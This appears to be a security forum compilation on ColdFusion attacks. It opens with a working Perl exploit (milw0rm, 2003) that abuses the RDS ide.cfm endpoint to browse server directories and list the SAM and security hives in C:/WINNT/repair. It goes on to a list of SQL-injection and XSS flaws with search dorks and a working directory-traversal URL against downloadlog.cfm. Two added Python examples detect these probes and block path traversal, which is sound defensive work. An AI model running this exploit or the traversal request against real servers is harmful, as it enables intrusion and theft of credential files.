# POST /CFIDE/main/ide.cfm?CFSRV=IDE&ACTION=BrowseDir_Studio HTTP/1.1
#
# Request String Value: 3:STR:15:C:/WINNT/repairSTR:1:*STR:0:
# Content-Length: 37
# Please wait.. ..
# HTTP/1.1 100 Continue
# Server: Microsoft-IIS/5.0
# Date: Tue, 01 Jul 2003 10:30:43 GMT
#
# HTTP/1.1 200 OK
# Server: Microsoft-IIS/5.0
# Date: Tue, 01 Jul 2003 10:30:43 GMT
# Connection: close
# Content-Type: text/html
#
# 50:2:F:11:autoexec.nt1:63:4383:0,02:F:9:config.nt1:64:25773:0,02:F:7:default1:66:1187843:0,
# 02:F:10:ntuser.dat1:66:1187843:0,02:F:3:sam1:65:204803:0,
# 02:F:12:secsetup.inf1:66:5735303:0,02:F:8:security1:65:286723:0,
# 02:F:9:setup.log1:66:1551943:0,02:F:8:software1:67:65331203:0,02:F:6:system1:66:9748483:0,0
# Vic7im1@cipher:~/Scripts/RDS_Sploit$
# ----------------------------------

use strict;
use IO::Socket;
use vars qw($response @clength @rarray);

## Dreamweaver string requests to ide.cfm
## --------------------------------------
#1:  3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:            Content-Length: 46
#2:  3:STR:7:C:/_mm/STR:1:*STR:0:                              Content-Length: 28
#3:  3:STR:6:C:/_mmSTR:9:ExistenceSTR:0:STR:0:STR:0:           Content-Length: 47
#4:  3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:            Content-Length: 46
#5:  3:STR:10:C:/_notes/STR:1:*STR:0:                          Content-Length: 32
#6:  5:STR:9:C:/_notesSTR:9:ExistenceSTR:0:STR:0:STR:0         Content-Length: 50
#7:  3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:            Content-Length: 46
#8:  5:STR:12:C:/XYIZNWSK/STR:6:CreateSTR:0:STR:0:STR:0:       Content-Length: 51
#9:  3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:            Content-Length: 46
#10: 3:STR:3:C:/STR:1:*STR:0:                                  Content-Length: 24
#11: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:            Content-Length: 46
#12: 5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0:     Content-Length: 53
#13: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:            Content-Length: 46
#14: 5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0:     Content-Length: 53
#15: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:            Content-Length: 46
#16: 5:STR:11:C:/XYIZNWSKSTR:6:RemoveSTR:0:STR:0:DSTR:0:       Content-Length: 51
#17: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:            Content-Length: 46
#18: 3:STR:8:C:/WINNTSTR:1:*STR*STR:0:                         Content-Length: 29
#19: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:            Content-Length: 46
#20: 3:STR:15:C:/WINNT/repairSTR:1:*STR:0:                     Content-Length: 37

# Static Content-Length: $string_val  if you plan on leaving C:\WINNT\repair you will need to know
# the $string_val.

@clength = (
    "Content-Length: 46",
    "Content-Length: 28",
    "Content-Length: 47",
    "Content-Length: 46",
    #"Content-Length: 32",
    #"Content-Length: 50",
    "Content-Length: 46",
    "Content-Length: 51",
    "Content-Length: 46",
    "Content-Length: 24",
    "Content-Length: 46",
    "Content-Length: 53",
    "Content-Length: 46",
    "Content-Length: 53",
    "Content-Length: 46",
    "Content-Length: 51",
    "Content-Length: 46",
    "Content-Length: 29",
    "Content-Length: 46",
    "Content-Length: 37"
);

@rarray = (
    "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
    "3:STR:7:C:/_mm/STR:1:*STR:0:",
    "3:STR:6:C:/_mmSTR:9:ExistenceSTR:0:STR:0:STR:0:",
    "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
    #"3:STR:10:C:/_notes/STR:1:*STR:0:",
    #"5:STR:9:C:/_notesSTR:9:ExistenceSTR:0:STR:0:STR:0",
    "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
    "5:STR:12:C:/XYIZNWSK/STR:6:CreateSTR:0:STR:0:STR:0:",
    "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
    "3:STR:3:C:/STR:1:*STR:0:",
    "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
    "5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0:",
    "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
    "5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0:",
    "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
    "5:STR:11:C:/XYIZNWSKSTR:6:RemoveSTR:0:STR:0:DSTR:0:",
    "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
    "3:STR:8:C:/WINNTSTR:1:*STR*STR:0:",
    "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
    "3:STR:15:C:/WINNT/repairSTR:1:*STR:0:"
);

system("clear");

# change target addy below.
my $TARGET = "192.168.0.100";
my $PORT   = "80";
my $STRING = "C:/WINNT/repair";
my $POST   = "POST /CFIDE/main/ide.cfm?CFSRV=IDE&ACTION=BrowseDir_Studio HTTP/1.1\r\n";

print "Generating Socket with Array Directory Values.\n";

my ( $i, $c );
for ( $i = 0; $i < @rarray; $i++ ) {
    for ( $c = 0; $c < @clength; $c++ ) {
        if ( $i == $c ) {
            &gen_sock( $TARGET, $PORT, $rarray[$i], $clength[$c] );
        }
    }
}

sub gen_sock() {
    my $sock = new IO::Socket::INET(
        PeerAddr => $TARGET,
        PeerPort => $PORT,
        Proto    => 'tcp',
    );
    die "Socket Could not be established ! $!" unless $sock;
    print "Target: $TARGET:$PORT\n";
    print "$POST\n";
    print "Request String Value: $rarray[$i]\n";
    print "$clength[$c]\n";
    print "Please wait.. ..\n";
    print $sock "$POST";
    print $sock "Content-Type: application/x-ColdFusionIDE\r\n";
    print $sock "User-Agent: Dreamweaver-RDS-SCM1.00\r\n";
    print $sock "Host: $TARGET\r\n";
    print $sock "$clength[$c]\r\n";
    print $sock "Connection: Keep-Alive\r\n";
    print $sock "Cache-Control: no-cache\r\n";
    print $sock "Cookie: ASPSESSIONIDQQQQGLDK=LPIHIKCAECKACDGPJCOLOAOJ\r\n";
    print $sock "\r\n";
    print $sock "$rarray[$i]";
    # lets return and print data to term
    while ( $response = <$sock> ) {
        chomp($response);
        print "$response\n";
    }
    close($sock);
}
# milw0rm.com [2003-07-07]
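The firebricks script above turns the Snort WEB-COLDFUSION signatures into iptables string matches on port 80, and the RDS exploit above posts its requests to /CFIDE/main/ide.cfm. As an added example (not code from the thread, the firebricks project or the exploit author), here is the same signature idea applied on the server side to web access-log lines, in Python. The log lines are constructed; the SIDs in the list are a subset of the rules above; the LOCAL-1 entry for the RDS endpoint is my own and has no Snort SID. The one thing this does that the iptables string match cannot (the script's "nocase-ignored" comments mark exactly that gap) is to percent-decode and lower-case the request path before matching.

```python
"""Match web access-log requests against the WEB-COLDFUSION signatures above.

Added example, not part of the thread: the log lines are constructed, and the
LOCAL-1 entry is this example's own addition for the RDS endpoint.
"""
import re
from urllib.parse import unquote

# (SID, case-insensitive substring, message); the numeric SIDs are a subset of
# the firebricks rules above, LOCAL-1 is constructed here for the RDS exploit.
SIGNATURES = [
    ("903", "/cfcache.map", "WEB-COLDFUSION cfcache.map access"),
    ("904", "/cfdocs/exampleapp/email/application.cfm", "WEB-COLDFUSION exampleapp application.cfm"),
    ("906", "/cfdocs/exampleapp/email/getfile.cfm", "WEB-COLDFUSION getfile.cfm access"),
    ("908", "/cfide/administrator/index.cfm", "WEB-COLDFUSION administrator access"),
    ("911", "/cfdocs/expeval/exprcalc.cfm", "WEB-COLDFUSION exprcalc access"),
    ("915", "/cfdocs/snippets/evaluate.cfm", "WEB-COLDFUSION evaluate.cfm access"),
    ("918", "/cfdocs/expeval/", "WEB-COLDFUSION expeval access"),
    ("928", "/cfdocs/exampleapp/", "WEB-COLDFUSION exampleapp access"),
    ("930", "/cfdocs/snippets/", "WEB-COLDFUSION snippets attempt"),
    ("935", "/cfide/administrator/startstop.html", "WEB-COLDFUSION startstop DOS access"),
    ("1540", "mode=debug", "WEB-COLDFUSION ?Mode=debug attempt"),
    ("LOCAL-1", "/cfide/main/ide.cfm", "RDS ide.cfm request (constructed signature)"),
]

# Combined log format: client ident user [time] "method path proto" status bytes
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>\S+)" (?P<status>\d{3}) (?P<bytes>\S+)'
)

# Constructed sample: one benign request, one host probing a sample app and the
# administrator and then RDS, one debug-mode probe, and one percent-encoded
# probe that a raw byte match would miss.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jul/2003:10:30:43 +0000] "GET /index.cfm?fuseaction=home HTTP/1.0" 200 5120
10.0.0.7 - - [01/Jul/2003:10:30:44 +0000] "GET /cfdocs/expeval/exprcalc.cfm HTTP/1.0" 200 814
10.0.0.7 - - [01/Jul/2003:10:30:45 +0000] "GET /CFIDE/administrator/index.cfm HTTP/1.0" 200 2231
10.0.0.9 - - [01/Jul/2003:10:30:46 +0000] "GET /shop/details.cfm?id=7&Mode=Debug HTTP/1.0" 200 9001
10.0.0.7 - - [01/Jul/2003:10:30:47 +0000] "POST /CFIDE/main/ide.cfm?CFSRV=IDE&ACTION=BrowseDir_Studio HTTP/1.1" 200 310
10.0.0.11 - - [01/Jul/2003:10:30:48 +0000] "GET /%63fdocs/snippets/evaluate.cfm HTTP/1.0" 404 290
"""


def normalize(path):
    """Percent-decode once and lower-case: the iptables string match above is
    case-sensitive and sees raw bytes, so /CFIDE or %63fdocs slip past it."""
    return unquote(path).lower()


def match_signatures(path):
    """Return every (sid, msg) whose substring occurs in the normalized path.
    Overlapping rules (918 with 911, 930 with 915) fire together, as in Snort."""
    p = normalize(path)
    return [(sid, msg) for sid, needle, msg in SIGNATURES if needle in p]


def scan_log(text):
    """Parse each access-log line and collect one hit per matching signature."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a real pipeline would count these
        for sid, msg in match_signatures(m.group("path")):
            hits.append({"src": m.group("src"), "sid": sid, "msg": msg,
                         "method": m.group("method"), "path": m.group("path"),
                         "status": int(m.group("status"))})
    return hits


def hits_per_source(hits):
    """Count hits per client address: one host tripping several rules in a
    short window is the trace a path scanner like the one above leaves."""
    counts = {}
    for h in hits:
        counts[h["src"]] = counts.get(h["src"], 0) + 1
    return counts


if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(f'{h["src"]:<10} SID {h["sid"]:<8} {h["msg"]}  {h["method"]} {h["path"]}')
    print(hits_per_source(scan_log(SAMPLE_LOG)))
```

Substring matching is deliberately as coarse as the original rules: the point is that the sample apps, /CFIDE/administrator and the RDS endpoint should never be requested from the outside on a production host, so any hit is worth looking at, and a 200 status on one of these paths means the file is actually there.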
CartWeaver (Details.cfm ProdID) Remote SQL Injection Vulnerability
admin_username:
admin_password:
admin:
dork: allinurl: Details.cfm?ProdID= allinurl: Results.cfm?category=

QuickEStore <= 8.2 (insertorder.cfm) Remote SQL Injection Vulnerability
admin password:
link admin:

XSS in Savvy Content Manager
The vulnerability exists due to insufficient sanitization of input in the "searchterms" parameter of the searchresults.cfm, search_results.cfm and search_results/index.cfm scripts.
Example:

XSS in Tradingeye Shop
The vulnerability exists due to insufficient sanitization of input in the "image" parameter of the details.cfm script.
Example:

XSS in iPostMX 2005
The vulnerability exists due to insufficient sanitization of input in the "RETURNURL" parameter of the userlogin.cfm and account.cfm scripts.
Example:

XSS in Goss iCM
The vulnerability exists due to insufficient sanitization of input in the "keyword" parameter of the index.cfm script.
Example:

SQL-Inj in 1WebCalendar
The vulnerability exists due to insufficient sanitization of input in the "EventID" parameter of the "viewEvent.cfm" script, the "NewsID" parameter of the "news/newsView.cfm" script and the "ThisDate" parameter of the "mainCal.cfm" script.
Example:

XSS in CommonSpot
The vulnerability exists due to insufficient sanitization of input in the "bNewWindow" parameter of the "loader.cfm" script.
Example:

XSS in e-publish
The vulnerability exists due to insufficient sanitization of input in the "obcatid" and "comid" parameters of the "show.cfm" script.
Example:
Note: more than once I have run into the case where, when we insert <script>alert()</script>, the opening tag in the page source is replaced with <InvalidTag>. It is bypassed very simply; see the example above.

XSS in Honeycomb Archive
Cross-site scripting is possible due to insufficient sanitization of input in the "keyword" parameter of the "search.cfm" script.
Example:

XSS in Hot Banana Web Content Management Suite
The vulnerability exists due to insufficient sanitization of input in the "keywords" parameter of the "index.cfm" script.
Example:

XSS in CF_Nuke
Cross-site scripting is possible due to insufficient sanitization of input in the "cat", "topic" and "newsid" parameters.
Example:

SQL-Inj in Magic Forum Personal
The vulnerability exists in the handling of input in the "ForumID", "Thread" and "ThreadID" parameters of the "view_forum.cfm" script.
Example:

XSS in Simple Message Board
The vulnerability exists due to insufficient sanitization of input in the 'forum.cfm', 'user.cfm', 'thread.cfm' and 'search.cfm' scripts.
Example:

XSS in Quick Cart
The vulnerability exists due to incorrect handling of input in the 'search' parameter of the 'search.cfm' script.
Example:

XSS in FuseTalk
The vulnerability exists due to incorrect handling of input in the 'ProfileID' parameter of the 'tombstone.cfm' module.
Example:
One more "bug", if you can call it that: in the admin panel, in the logging section, instead of a log you can download any file from the filesystem:
http://www.site.com/cfide/administrator/logging/downloadlog.cfm?logfile=../../../../boot.ini
There is no check at all. The vulnerability is present in version 7; I haven't checked other versions, and if I get a chance to check I'll report back.
Vulnerable code:
Code:
<cfheader name="Content-Disposition" value="attachment;filename=#url.log#">
<cfheader name="Content-Description" value="This is a comma-delimited file.">
<cfcontent file="#LogDir#/#url.log#" type="application/x-unknown">
You can see that the #url.log# variable is not validated in any way.
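The downloadlog.cfm snippet above concatenates #url.log# into the <cfcontent> path with no check, which is why the ../../../../boot.ini request works. As an added example (not from the post, and in Python rather than CFML, standing in for the check the template lacks), here is a log-download path resolver that accepts only a bare *.log name and then confirms the resolved path is still inside the log directory. The directory layout, file names and log content are constructed for the demonstration.

```python
"""Confine a user-supplied log name to the log directory.

Added example, not part of the thread: stands in for the validation that the
downloadlog.cfm snippet above lacks.  Directory layout and contents below are
constructed.
"""
import os
import re
import tempfile

# A log name is a bare file name: letters, digits, '_', '-', '.', ending in .log
SAFE_NAME = re.compile(r"^[A-Za-z0-9_.-]+\.log$")


class LogAccessError(ValueError):
    pass


def resolve_log_path(log_dir, requested):
    """Return the real path of `requested` inside log_dir, or raise LogAccessError.

    Two independent checks replace the missing validation:
    1. the name must look like a bare log file name (no separators, no '..');
    2. the resolved path must still sit under the real log directory, which
       also catches a symlink inside the directory that points outside it.
    """
    if not isinstance(requested, str) or "\x00" in requested:
        raise LogAccessError("invalid characters in log name")
    if ".." in requested or not SAFE_NAME.match(requested):
        raise LogAccessError("log name must be a bare *.log file name")
    base = os.path.realpath(log_dir)
    candidate = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, candidate]) != base:
        raise LogAccessError("resolved path escapes the log directory")
    if not os.path.isfile(candidate):
        raise LogAccessError("no such log file")
    return candidate


def make_log_dir():
    """Constructed layout: <tmp>/secret.txt beside <tmp>/logs/application.log,
    plus, where the platform allows it, logs/link.log -> ../secret.txt."""
    root = tempfile.mkdtemp(prefix="cf-demo-")
    log_dir = os.path.join(root, "logs")
    os.mkdir(log_dir)
    with open(os.path.join(root, "secret.txt"), "w") as fh:
        fh.write("not a log\n")
    with open(os.path.join(log_dir, "application.log"), "w") as fh:
        fh.write('"Information","jrpp-0","07/01/03","10:30:43",,"constructed entry"\n')
    try:
        os.symlink(os.path.join("..", "secret.txt"), os.path.join(log_dir, "link.log"))
    except (OSError, NotImplementedError, AttributeError):
        pass  # no symlink support here; link.log is then simply absent
    return log_dir


REQUESTS = [
    "application.log",        # legitimate
    "../../../../boot.ini",   # the traversal from the post above
    "/etc/passwd",            # absolute path
    "C:\\Windows\\win.ini",   # Windows absolute path
    "app\x00.log",            # NUL byte
    "nonexistent.log",        # well-formed but absent
    "link.log",               # symlink escaping the directory (if created)
]


def check_requests(log_dir, requests=REQUESTS):
    """Map each requested name to 'ok' or 'rejected: <reason>'."""
    results = {}
    for name in requests:
        try:
            resolve_log_path(log_dir, name)
            results[name] = "ok"
        except LogAccessError as exc:
            results[name] = f"rejected: {exc}"
    return results


if __name__ == "__main__":
    for name, outcome in check_requests(make_log_dir()).items():
        print(f"{name!r:<28} {outcome}")
```

The name check alone would not stop a symlink dropped into the log directory, and the realpath check alone would give the same opaque error for every bad input, so both are kept. For the template itself the tighter equivalent is to serve only names taken from the list of log files the admin page already enumerates, and never the raw URL parameter.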